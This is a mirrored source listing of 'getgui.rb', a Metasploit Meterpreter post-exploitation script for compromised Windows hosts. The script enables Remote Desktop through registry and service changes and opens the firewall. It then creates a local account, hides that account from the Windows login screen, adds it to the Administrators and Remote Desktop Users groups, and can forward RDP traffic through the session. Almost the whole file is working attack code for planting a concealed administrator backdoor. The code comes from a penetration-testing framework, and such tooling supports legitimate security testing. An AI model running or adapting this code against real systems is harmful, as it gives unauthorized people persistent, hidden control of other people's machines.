Mirror of metasploit
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

getgui.rb 5.9KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190
  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. # Author: Carlos Perez at carlos_perez[at]darkoperator.com
  7. #-------------------------------------------------------------------------------
  8. ################## Variable Declarations ##################
  9. session = client
  10. host_name = client.sys.config.sysinfo['Computer']
  11. # Create Filename info to be appended to downloaded files
  12. filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
  13. # Create a directory for the logs
  14. logs = ::File.join(Msf::Config.log_directory,'scripts', 'getgui')
  15. # Create the log directory
  16. ::FileUtils.mkdir_p(logs)
  17. # Cleaup script file name
  18. @dest = logs + "/clean_up_" + filenameinfo + ".rc"
  19. @@exec_opts = Rex::Parser::Arguments.new(
  20. "-h" => [ false, "Help menu." ],
  21. "-e" => [ false, "Enable RDP only." ],
  22. "-p" => [ true, "The Password of the user to add." ],
  23. "-u" => [ true, "The Username of the user to add." ],
  24. "-f" => [ true, "Forward RDP Connection." ]
  25. )
  26. def usage
  27. print_line("Windows Remote Desktop Enabler Meterpreter Script")
  28. print_line("Usage: getgui -u <username> -p <password>")
  29. print_line("Or: getgui -e")
  30. print(@@exec_opts.usage)
  31. raise Rex::Script::Completed
  32. end
  33. def enablerd()
  34. key = 'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server'
  35. value = "fDenyTSConnections"
  36. begin
  37. v = registry_getvaldata(key,value)
  38. print_status "Enabling Remote Desktop"
  39. if v == 1
  40. print_status "\tRDP is disabled; enabling it ..."
  41. registry_setvaldata(key,value,0,"REG_DWORD")
  42. file_local_write(@dest,"reg setval -k \'HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\' -v 'fDenyTSConnections' -d \"1\"")
  43. else
  44. print_status "\tRDP is already enabled"
  45. end
  46. rescue::Exception => e
  47. print_status("The following Error was encountered: #{e.class} #{e}")
  48. end
  49. end
  50. def enabletssrv()
  51. rdp_key = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TermService"
  52. begin
  53. v2 = registry_getvaldata(rdp_key,"Start")
  54. print_status "Setting Terminal Services service startup mode"
  55. if v2 != 2
  56. print_status "\tThe Terminal Services service is not set to auto, changing it to auto ..."
  57. service_change_startup("TermService","auto")
  58. file_local_write(@dest,"execute -H -f cmd.exe -a \"/c sc config termservice start= disabled\"")
  59. cmd_exec("sc start termservice")
  60. file_local_write(@dest,"execute -H -f cmd.exe -a \"/c sc stop termservice\"")
  61. else
  62. print_status "\tTerminal Services service is already set to auto"
  63. end
  64. #Enabling Exception on the Firewall
  65. print_status "\tOpening port in local firewall if necessary"
  66. cmd_exec('netsh firewall set service type = remotedesktop mode = enable')
  67. file_local_write(@dest,"execute -H -f cmd.exe -a \"/c 'netsh firewall set service type = remotedesktop mode = enable'\"")
  68. rescue::Exception => e
  69. print_status("The following Error was encountered: #{e.class} #{e}")
  70. end
  71. end
  72. def addrdpusr(session, username, password)
  73. rdu = resolve_sid("S-1-5-32-555")[:name]
  74. admin = resolve_sid("S-1-5-32-544")[:name]
  75. print_status "Setting user account for logon"
  76. print_status "\tAdding User: #{username} with Password: #{password}"
  77. begin
  78. addusr_out = cmd_exec("cmd.exe", "/c net user #{username} #{password} /add")
  79. if addusr_out =~ /success/i
  80. file_local_write(@dest,"execute -H -f cmd.exe -a \"/c net user #{username} /delete\"")
  81. print_status "\tHiding user from Windows Login screen"
  82. hide_user_key = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList'
  83. registry_setvaldata(hide_user_key,username,0,"REG_DWORD")
  84. file_local_write(@dest,"reg deleteval -k HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\ NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList -v #{username}")
  85. print_status "\tAdding User: #{username} to local group '#{rdu}'"
  86. cmd_exec("cmd.exe","/c net localgroup \"#{rdu}\" #{username} /add")
  87. print_status "\tAdding User: #{username} to local group '#{admin}'"
  88. cmd_exec("cmd.exe","/c net localgroup #{admin} #{username} /add")
  89. print_status "You can now login with the created user"
  90. else
  91. print_error("Account could not be created")
  92. print_error("Error:")
  93. addusr_out.each_line do |l|
  94. print_error("\t#{l.chomp}")
  95. end
  96. end
  97. rescue::Exception => e
  98. print_status("The following Error was encountered: #{e.class} #{e}")
  99. end
  100. end
  101. def message
  102. print_status "Windows Remote Desktop Configuration Meterpreter Script by Darkoperator"
  103. print_status "Carlos Perez carlos_perez@darkoperator.com"
  104. end
  105. ################## MAIN ##################
  106. # Parsing of Options
  107. usr = nil
  108. pass = nil
  109. lang = nil
  110. lport = 1024 + rand(1024)
  111. enbl = nil
  112. frwrd = nil
  113. @@exec_opts.parse(args) { |opt, idx, val|
  114. case opt
  115. when "-u"
  116. usr = val
  117. when "-p"
  118. pass = val
  119. when "-h"
  120. usage
  121. when "-f"
  122. frwrd = true
  123. lport = val
  124. when "-e"
  125. enbl = true
  126. end
  127. }
  128. if client.platform == 'windows'
  129. if args.length > 0
  130. if enbl or (usr and pass)
  131. message
  132. if enbl
  133. if is_admin?
  134. enablerd()
  135. enabletssrv()
  136. else
  137. print_error("Insufficient privileges, Remote Desktop Service was not modified.")
  138. end
  139. end
  140. if usr and pass
  141. if is_admin?
  142. addrdpusr(session, usr, pass)
  143. else
  144. print_error("Insufficient privileges, account was not be created.")
  145. end
  146. end
  147. if frwrd == true
  148. print_status("Starting the port forwarding at local port #{lport}")
  149. client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 3389 -r 127.0.0.1")
  150. end
  151. print_status("For cleanup use command: run multi_console_command -r #{@dest}")
  152. else
  153. usage
  154. end
  155. else
  156. usage
  157. end
  158. else
  159. print_error("This version of Meterpreter is not supported with this Script!")
  160. raise Rex::Script::Completed
  161. end